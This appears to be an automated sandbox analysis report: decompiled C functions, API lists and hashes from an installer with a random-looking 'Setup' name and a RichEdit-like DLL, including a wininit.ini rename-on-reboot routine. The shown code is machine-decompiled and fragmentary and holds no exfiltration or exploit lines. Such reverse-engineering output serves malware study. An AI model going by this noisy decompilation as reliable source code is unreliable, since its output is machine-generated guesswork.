                                      0x1000beb2
                                      0x1000bec1
                                      0x1000bed1
                                      0x1000bee1
                                      0x00000000
                                      0x1000bee7
                                      0x1000bcf9
                                      0x1000bcff
                                      0x1000bd02
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x1000bd02
                                      0x1000bcb4
                                      0x1000bef1
                                      0x1000bf0b
                                      0x1000bf1f
                                      0x1000bf1f
                                      0x00000000
                                      0x1000bf25
                                      0x00000000
                                      0x1000bcba
                                      0x1000bc3a
                                      0x00000000
                                      0x1000bc83
                                      0x1000bc3f
                                      0x1000bc52
                                      0x00000000

                                      APIs
                                      • GetWindowLongW.USER32(?,00000000), ref: 1000BC24
                                      • DefWindowProcW.USER32(?,00000081,?,?), ref: 1000BC83
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 1000C030
                                      Strings
                                      • WM_NCCREATE: hWnd %p style 0x%08x, xrefs: 1000BC4D
                                      • exit hwnd %p msg %04x (%s) %lx %lx, unicode %d -> %lu, xrefs: 1000C05E
                                      • enter hwnd %p msg %04x (%s) %lx %lx, unicode %d, xrefs: 1000BC11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Proc$Long
                                      • String ID: WM_NCCREATE: hWnd %p style 0x%08x$enter hwnd %p msg %04x (%s) %lx %lx, unicode %d$exit hwnd %p msg %04x (%s) %lx %lx, unicode %d -> %lu
                                      • API String ID: 1311478503-452856824
                                      • Opcode ID: b418a6ad58d816df1ee0cb66856785b853f8bda1ff7a21db89125a00a35db6a2
                                      • Instruction ID: 5b0d388290c247a159ef48e4e9e6a2ec5c093b8039d0c8a722f8059391e5a455
                                      • Opcode Fuzzy Hash: b418a6ad58d816df1ee0cb66856785b853f8bda1ff7a21db89125a00a35db6a2
                                      • Instruction Fuzzy Hash: C10283B5A00209EFDB04CF98D985DEEB7B5FF88340F208259F919A7245D734AA41CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 90%
                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42eb70; // 0x720250
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "oryzytcrolozawnhxg Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42eb68; // 0x3042c
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                      0x0040100a
                                      0x00401039
                                      0x00401047
                                      0x0040104d
                                      0x00401051
                                      0x0040105b
                                      0x00401061
                                      0x00401064
                                      0x004010f3
                                      0x00401089
                                      0x0040108c
                                      0x004010a6
                                      0x004010bd
                                      0x004010cc
                                      0x004010cf
                                      0x004010d5
                                      0x004010d9
                                      0x004010e4
                                      0x004010ed
                                      0x004010ef
                                      0x004010ef
                                      0x00401100
                                      0x00401105
                                      0x0040110d
                                      0x00401110
                                      0x00401112
                                      0x00401118
                                      0x0040111f
                                      0x00401126
                                      0x00401130
                                      0x00401142
                                      0x00401156
                                      0x00401160
                                      0x00401165
                                      0x00401165
                                      0x00401110
                                      0x0040116e
                                      0x00000000
                                      0x00401178
                                      0x00401010
                                      0x00401013
                                      0x00401015
                                      0x00401019
                                      0x0040101f
                                      0x0040101f
                                      0x00000000

                                      APIs
                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32 ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                      • FillRect.USER32 ref: 004010E4
                                      • DeleteObject.GDI32(?), ref: 004010ED
                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                      • SetTextColor.GDI32(00000000,?), ref: 00401130
                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                      • DrawTextA.USER32(00000000,oryzytcrolozawnhxg Setup,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F$oryzytcrolozawnhxg Setup
                                      • API String ID: 941294808-3389780391
                                      • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                      • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                                      • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                      • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10007190, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 91registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E10007190(void* __ecx) {
				struct _WNDCLASSW _v44;
				struct _WNDCLASSA _v84;
				void* _t51;

				_t51 = __ecx;
				_v44.style = 0x400b;
				_v44.lpfnWndProc = E1000C080;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 4;
				_v44.hInstance = 0;
				_v44.hIcon = 0;
				_v44.hCursor = LoadCursorW(0, 0x7f01);
				_v44.hbrBackground = GetStockObject(5);
				_v44.lpszMenuName = 0;
				if(E10007550(_t51) == 0) {
					_v44.lpszClassName = "RichEdit20W";
					if((RegisterClassA( &_v44) & 0x0000ffff) != 0) {
						_v44.lpszClassName = "RichEdit50W";
						if((RegisterClassA( &_v44) & 0x0000ffff) != 0) {
							L10:
							_v84.style = 0x400b;
							_v84.lpfnWndProc = E1000C0D0;
							_v84.cbClsExtra = 0;
							_v84.cbWndExtra = 4;
							_v84.hInstance = 0;
							_v84.hIcon = 0;
							_v84.hCursor = LoadCursorW(0, 0x7f01);
							_v84.hbrBackground = GetStockObject(5);
							_v84.lpszMenuName = 0;
							if((RegisterClassA( &_v84) & 0x0000ffff) != 0) {
								_v84.lpszClassName = "RichEdit50A";
								if((RegisterClassA( &_v84) & 0x0000ffff) != 0) {
									return 1;
								}
								return 0;
							}
							return 0;
						}
						return 0;
					}
					return 0;
				}
				if((RegisterClassW( &_v44) & 0x0000ffff) != 0) {
					_v44.lpszClassName = L"RICHEDIT50W";
					if((RegisterClassW( &_v44) & 0x0000ffff) != 0) {
						goto L10;
					}
					return 0;
				}
				return 0;
			}






                                      0x10007190
                                      0x10007196
                                      0x1000719d
                                      0x100071a4
                                      0x100071ab
                                      0x100071b2
                                      0x100071b9
                                      0x100071cd
                                      0x100071d8
                                      0x100071db
                                      0x100071e9
                                      0x10007224
                                      0x1000723a
                                      0x10007243
                                      0x10007259
                                      0x10007262
                                      0x10007262
                                      0x10007269
                                      0x10007270
                                      0x10007277
                                      0x1000727e
                                      0x10007285
                                      0x10007299
                                      0x100072a4
                                      0x100072a7
                                      0x100072bd
                                      0x100072c3
                                      0x100072d9
                                      0x00000000
                                      0x100072df
                                      0x00000000
                                      0x100072db
                                      0x00000000
                                      0x100072bf
                                      0x00000000
                                      0x1000725b
                                      0x00000000
                                      0x1000723c
                                      0x100071fa
                                      0x10007203
                                      0x10007219
                                      0x00000000
                                      0x10007222
                                      0x00000000
                                      0x1000721b
                                      0x00000000

                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 100071C7
                                      • GetStockObject.GDI32(00000005), ref: 100071D2
                                        • Part of subcall function 10007550: GetVersion.KERNEL32(?,?,100071E7), ref: 10007554
                                      • RegisterClassW.USER32 ref: 100071EF
                                      • RegisterClassW.USER32 ref: 1000720E
                                      • RegisterClassA.USER32 ref: 1000722F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ClassRegister$CursorLoadObjectStockVersion
                                      • String ID: RICHEDIT50W$RichEdit20W$RichEdit50A$RichEdit50W
                                      • API String ID: 4234609932-3574488814
                                      • Opcode ID: e51c89301f8e1d8d231c55b06cb383409676bcf5895e3e2bd612b3a40c628aaa
                                      • Instruction ID: 774b2370a60af337e5ddffe8abf2c0aa22eae17234ffa1ddfd864578c5e57ad0
                                      • Opcode Fuzzy Hash: e51c89301f8e1d8d231c55b06cb383409676bcf5895e3e2bd612b3a40c628aaa
                                      • Instruction Fuzzy Hash: 5B315BB0D04399EAFB10DFE4C8987AEBAF4FB04385F508419F905A6284D7B9C544CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000B510, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 70memorythreadCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 62%
                                      			E1000B510(void* __ecx, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* _t25;

				0x10000000("\n", __ecx);
				_v8 = _a8;
				if(_v8 == 0) {
					if(_a12 == 0) {
						UnregisterClassW(0x65, 0);
						UnregisterClassW(L"RICHEDIT50W", 0);
						UnregisterClassA(0x65, 0);
						UnregisterClassA("RichEdit50A", 0);
						if( *0x10023874 != 0) {
							UnregisterClassW(L"REListBox20W", 0);
						}
						if( *0x10023878 != 0) {
							UnregisterClassW(L"REComboBox20W", 0);
						}
						0x10000000();
						_t25 =  *0x10023870; // 0x0
						HeapDestroy(_t25);
						0x10000000();
					}
					L13:
					return 1;
				}
				if(_v8 == 1) {
					DisableThreadLibraryCalls(_a4);
					 *0x10023870 = HeapCreate(0, 0x10000, 0);
					_push(_a4);
					if(E10007190(_a4) != 0) {
						 *0x1002387c = LoadCursorW(_a4, "1");
						0x10000000();
						goto L13;
					}
					return 0;
				}
				goto L13;
			}





                                      0x1000b519
                                      0x1000b524
                                      0x1000b52b
                                      0x1000b58c
                                      0x1000b594
                                      0x1000b5a1
                                      0x1000b5ab
                                      0x1000b5b8
                                      0x1000b5c5
                                      0x1000b5ce
                                      0x1000b5ce
                                      0x1000b5db
                                      0x1000b5e4
                                      0x1000b5e4
                                      0x1000b5ea
                                      0x1000b5ef
                                      0x1000b5f6
                                      0x1000b5fc
                                      0x1000b5fc
                                      0x1000b601
                                      0x00000000
                                      0x1000b601
                                      0x1000b531
                                      0x1000b53c
                                      0x1000b551
                                      0x1000b559
                                      0x1000b564
                                      0x1000b57c
                                      0x1000b581
                                      0x00000000
                                      0x1000b581
                                      0x00000000
                                      0x1000b566
                                      0x00000000

                                      APIs
                                      • DisableThreadLibraryCalls.KERNEL32(?), ref: 1000B53C
                                      • HeapCreate.KERNEL32(00000000,00010000,00000000), ref: 1000B54B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CallsCreateDisableHeapLibraryThread
                                      • String ID: REComboBox20W$REListBox20W$RICHEDIT50W$RichEdit50A
                                      • API String ID: 4256521893-2544720935
                                      • Opcode ID: 17ae2cc3a931d976a22b0e621eec5621edae63bf1e2c446208552c85438da1ee
                                      • Instruction ID: b66b16e4ad38f6a3e0a32cb2f67fc1dac48ef38ee7b6e563d5f68aea8832f2e2
                                      • Opcode Fuzzy Hash: 17ae2cc3a931d976a22b0e621eec5621edae63bf1e2c446208552c85438da1ee
                                      • Instruction Fuzzy Hash: F8215174A40714FBF710EFA0DC8EB9977E6EB05782F608014F6029A1E5DB76E990CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405679, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E00405679() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405C49(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ebf0 =  *0x42ebf0 + 1;
						return _t20;
					}
				}
				 *0x42c168 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
						_t18 =  *0x42eb70; // 0x720250
						_t56 = _t55 + 0x10;
						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405577(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405577(_t26 + 0xa, 0x409328);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E0040592B(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405602(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                      0x0040567f
                                      0x00405686
                                      0x0040568a
                                      0x00405693
                                      0x00405697
                                      0x004057d6
                                      0x004057d6
                                      0x00000000
                                      0x004057d6
                                      0x00405697
                                      0x004056a3
                                      0x004056b9
                                      0x004056e1
                                      0x004056ec
                                      0x004056f0
                                      0x00405710
                                      0x00405712
                                      0x00405717
                                      0x00405721
                                      0x0040572e
                                      0x00405733
                                      0x00405738
                                      0x0040573c
                                      0x00000000
                                      0x00000000
                                      0x0040574b
                                      0x0040574d
                                      0x0040575a
                                      0x0040575e
                                      0x004057cf
                                      0x004057d0
                                      0x00000000
                                      0x0040577a
                                      0x00405787
                                      0x004057ec
                                      0x004057f3
                                      0x0040579a
                                      0x0040579a
                                      0x0040579c
                                      0x004057a5
                                      0x004057b0
                                      0x004057c2
                                      0x004057c9
                                      0x00000000
                                      0x004057c9
                                      0x004057f5
                                      0x004057f6
                                      0x004057fb
                                      0x004057fd
                                      0x0040580a
                                      0x0040580a
                                      0x0040580e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004057ff
                                      0x004057ff
                                      0x00405802
                                      0x00405805
                                      0x00405806
                                      0x00000000
                                      0x004057ff
                                      0x00405792
                                      0x00405797
                                      0x00000000
                                      0x00405797
                                      0x0040575e
                                      0x004056bb
                                      0x004056c6
                                      0x004056cf
                                      0x004056d3
                                      0x00000000
                                      0x00000000
                                      0x004056d3
                                      0x004057e0

                                      APIs
                                        • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                        • Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                        • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
                                      • GetShortPathNameA.KERNEL32 ref: 004056CF
                                      • GetShortPathNameA.KERNEL32 ref: 004056EC
                                      • wsprintfA.USER32 ref: 0040570A
                                      • GetFileSize.KERNEL32(00000000,00000000,0042BBE0,C0000000,00000004,0042BBE0,?,?,?,00000000,000000F1,?), ref: 00405745
                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405754
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040576A
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E0,00000000,-0000000A,00409328,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B0
                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004057C2
                                      • GlobalFree.KERNEL32 ref: 004057C9
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 004057D0
                                        • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                        • Part of subcall function 00405577: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                      • String ID: %s=%s$[Rename]
                                      • API String ID: 3772915668-1727408572
                                      • Opcode ID: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                      • Instruction ID: f99a8e27a0ac237a4403d65adef5acaf7166b20d7f6f9042e90736f67bd768b8
                                      • Opcode Fuzzy Hash: 4c02c2ac3e9ad1514aa896e9bf178216840010c0f99e66a1499b9443596943aa
                                      • Instruction Fuzzy Hash: 8441D031604B15BBE6216B619C49F6B3A6CEF45754F100436F905F72C2EA78A801CEBD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10007DB0, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 305memorywindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 24%
                                      			E10007DB0(intOrPtr* _a4) {
				long _v8;
				BYTE* _v12;
				BITMAPINFOHEADER* _v16;
				struct HENHMETAFILE__* _v20;
				long _v24;
				long _v28;
				int _v32;
				signed int _v36;
				struct HBITMAP__* _v40;
				struct HDC__* _v44;
				long _v48;
				long _v52;
				struct tagMETAFILEPICT _v68;
				intOrPtr* _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t119;
				int _t123;
				intOrPtr _t129;
				intOrPtr _t132;
				long _t191;
				void* _t206;
				void* _t207;
				void* _t208;

				_v12 = 0;
				_v32 = 0;
				_v24 = 0;
				_v8 = 1;
				_v68.mm = 1;
				_v48 = 0;
				_v52 = _v48;
				while(1) {
					0x10000000(_a4);
					_t207 = _t206 + 4;
					if( *_a4 == 2) {
						if(_v8 != 1) {
							0x10000000(_a4);
							_t207 = _t207 + 4;
						} else {
							if(_v12 == 0) {
								_t123 = E10007C40(_a4,  &_v12);
								_t207 = _t207 + 8;
								_v32 = _t123;
							}
						}
					}
					_t116 = _a4;
					if( *_t116 == 4) {
						return _t116;
					}
					0x10000000(_a4, 1, 1);
					_t206 = _t207 + 0xc;
					if(_t116 == 0) {
						_t117 = _a4;
						0x10000000(_t117, 1, 0);
						_t206 = _t206 + 0xc;
						if(_t117 == 0) {
							0x10000000(_a4, 3, 0xd);
							_t208 = _t206 + 0xc;
							if(_t117 != 0) {
								_t118 = _a4;
								0x10000000(_t118, 0xd, 2);
								_t206 = _t208 + 0xc;
								if(_t118 == 0) {
									_t119 = _a4;
									0x10000000(_t119, 0xd, 3);
									_t206 = _t206 + 0xc;
									if(_t119 == 0) {
										0x10000000(_a4, 0xd, 5);
										_t206 = _t206 + 0xc;
										if(_t119 == 0) {
											0x10000000(_a4, 0xd, 9);
											_t206 = _t206 + 0xc;
											if(_t119 == 0) {
												0x10000000(_a4, 0xd, 0xa);
												_t206 = _t206 + 0xc;
												if(_t119 == 0) {
													0x10000000(_a4, 0xd, 0xb);
													_t206 = _t206 + 0xc;
													if(_t119 == 0) {
														0x10000000(_a4, 0xd, 0xc);
														_t206 = _t206 + 0xc;
														if(_t119 == 0) {
															0x10000000("Non supported attribute: %d %d %d\n",  *_a4,  *((intOrPtr*)(_a4 + 4)),  *((intOrPtr*)(_a4 + 8)));
															_t206 = _t206 + 0x10;
														} else {
															_v48 =  *(_a4 + 0xc);
														}
													} else {
														_v52 =  *(_a4 + 0xc);
													}
												} else {
													_v68.yExt =  *(_a4 + 0xc);
												}
											} else {
												_v68.xExt =  *(_a4 + 0xc);
											}
										} else {
											_v24 = 1;
										}
									} else {
										if( *(_a4 + 0xc) != 0) {
											0x10000000("dibitmap should be 0 (%d)\n",  *(_a4 + 0xc));
											_t206 = _t206 + 8;
										}
										_v24 = 3;
									}
								} else {
									_v68.mm =  *(_a4 + 0xc);
									_v24 = 2;
								}
							} else {
								_t129 = _a4;
								0x10000000(_t129);
								0x10000000(_a4, 1, 1);
								_t206 = _t208 + 0x10;
								if(_t129 != 0) {
									_v8 = _v8 - 1;
								}
							}
						} else {
							_v8 = _v8 + 1;
						}
					} else {
						_t191 = _v8 - 1;
						_v8 = _t191;
						if(_t191 == 0) {
							if(_v12 != 0) {
								_v28 = _v24;
								if(_v28 == 1) {
									_v20 = SetEnhMetaFileBits(_v32, _v12);
									if(_v20 != 0) {
										E100078B0( *((intOrPtr*)(_a4 + 0x64)), _v20, 0,  &_v52);
										_t206 = _t206 + 0x10;
									}
								} else {
									if(_v28 == 2) {
										_v20 = SetWinMetaFileBits(_v32, _v12, 0,  &_v68);
										if(_v20 != 0) {
											E100078B0( *((intOrPtr*)(_a4 + 0x64)), _v20, 0,  &_v52);
											_t206 = _t206 + 0x10;
										}
									} else {
										if(_v28 == 3) {
											_v16 = _v12;
											_v44 = GetDC(0);
											_v36 = _v16->biClrUsed;
											if(_v36 == 0 && (_v16->biBitCount & 0x0000ffff) <= 8) {
												_v36 = 1 << (_v16->biBitCount & 0x0000ffff);
											}
											_v40 = CreateDIBitmap(_v44, _v16, 4, _v16 + 0x2c + _v36 * 4, _v16, 0);
											if(_v40 != 0) {
												E100078B0( *((intOrPtr*)(_a4 + 0x64)), 0, _v40,  &_v52);
												_t206 = _t206 + 0x10;
											}
											ReleaseDC(0, _v44);
										}
									}
								}
							}
							HeapFree(GetProcessHeap(), 0, _v12);
							_t132 = _a4;
							0x10000000(_t132);
							return _t132;
						}
					}
				}
			}



























                                      0x10007db6
                                      0x10007dbd
                                      0x10007dc4
                                      0x10007dcb
                                      0x10007dd2
                                      0x10007dd9
                                      0x10007de3
                                      0x10007de6
                                      0x10007dea
                                      0x10007def
                                      0x10007df8
                                      0x10007dfe
                                      0x10007e1f
                                      0x10007e24
                                      0x10007e00
                                      0x10007e04
                                      0x10007e0e
                                      0x10007e13
                                      0x10007e16
                                      0x10007e16
                                      0x10007e19
                                      0x10007dfe
                                      0x10007e27
                                      0x10007e2d
                                      0x00000000
                                      0x00000000
                                      0x10007e3c
                                      0x10007e41
                                      0x10007e46
                                      0x10007e5e
                                      0x10007e62
                                      0x10007e67
                                      0x10007e6c
                                      0x10007e84
                                      0x10007e89
                                      0x10007e8e
                                      0x10007ec2
                                      0x10007ec6
                                      0x10007ecb
                                      0x10007ed0
                                      0x10007eeb
                                      0x10007eef
                                      0x10007ef4
                                      0x10007ef9
                                      0x10007f2c
                                      0x10007f31
                                      0x10007f36
                                      0x10007f4c
                                      0x10007f51
                                      0x10007f56
                                      0x10007f6b
                                      0x10007f70
                                      0x10007f75
                                      0x10007f8a
                                      0x10007f8f
                                      0x10007f94
                                      0x10007fa9
                                      0x10007fae
                                      0x10007fb3
                                      0x10007fd9
                                      0x10007fde
                                      0x10007fb5
                                      0x10007fbb
                                      0x10007fbb
                                      0x10007f96
                                      0x10007f9c
                                      0x10007f9c
                                      0x10007f77
                                      0x10007f7d
                                      0x10007f7d
                                      0x10007f58
                                      0x10007f5e
                                      0x10007f5e
                                      0x10007f38
                                      0x10007f38
                                      0x10007f38
                                      0x10007efb
                                      0x10007f02
                                      0x10007f10
                                      0x10007f15
                                      0x10007f15
                                      0x10007f18
                                      0x10007f18
                                      0x10007ed2
